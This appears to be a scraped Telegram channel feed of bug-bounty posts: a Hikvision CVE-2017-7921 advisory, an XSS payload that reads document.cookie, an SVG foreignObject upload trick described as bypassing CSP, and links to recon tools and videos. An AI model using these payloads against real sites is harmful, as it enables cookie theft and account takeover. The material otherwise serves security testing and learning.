🚨🕷CVE-2017-7921🕷🚨
An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
👍4❤3🔥1👏1
SQLi and Xss on Same program
Pyload: <svg onload=prompt%26%230000000040document.cookie)>
Pyload: <svg onload=prompt%26%230000000040document.cookie)>
❤9🔥3👏2👍1
Media is too big
VIEW IN TELEGRAM
I wanted to create a free blogger website. You will get many things for free on this site. Now I tested what I saw. Everyone can visit: https://shadowcyber51.blogspot.com/2024/10/test.html?m=1
🔥9🥰3👍2
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
🔥12👏3👍1
Those who are interested in Android phone hacking can read this article
https://shorturl.at/x8jNs
https://shorturl.at/x8jNs
🔥7❤2👍1
Live Bug Bounty Advanced GitHub Recon | Secrets of Bug Hunters
https://youtu.be/46SZdvM-fxw?si=VVLWHqOlus8J7MKO
https://youtu.be/46SZdvM-fxw?si=VVLWHqOlus8J7MKO
YouTube
Live Bug Bounty Advanced GitHub Recon | Secrets of Bug Hunters
🔴 LIVE BUG BOUNTY: Advanced GitHub Recon | Secrets of Pro Bug Hunters
Welcome to an exclusive live bug bounty session where we dive deep into advanced GitHub recon! 🚀 Learn the top secrets of pro bug hunters as I walk you through my process to find vulnerabilities…
Welcome to an exclusive live bug bounty session where we dive deep into advanced GitHub recon! 🚀 Learn the top secrets of pro bug hunters as I walk you through my process to find vulnerabilities…
❤22💯2👍1
My team met developed a Recon Engine with subdomain find, port scan, parameter find, technology detect, information disclosure, git dorking, cve search etc many more features. You guys should check this Recon Engine. If you know anything valid and interesting that missing on the Recon engine you can suggest us by giving link. DM us.
https://freelancermijan.github.io/reconengine/
https://freelancermijan.github.io/reconengine/
👍30❤11🔥7💩5🤝4🥰3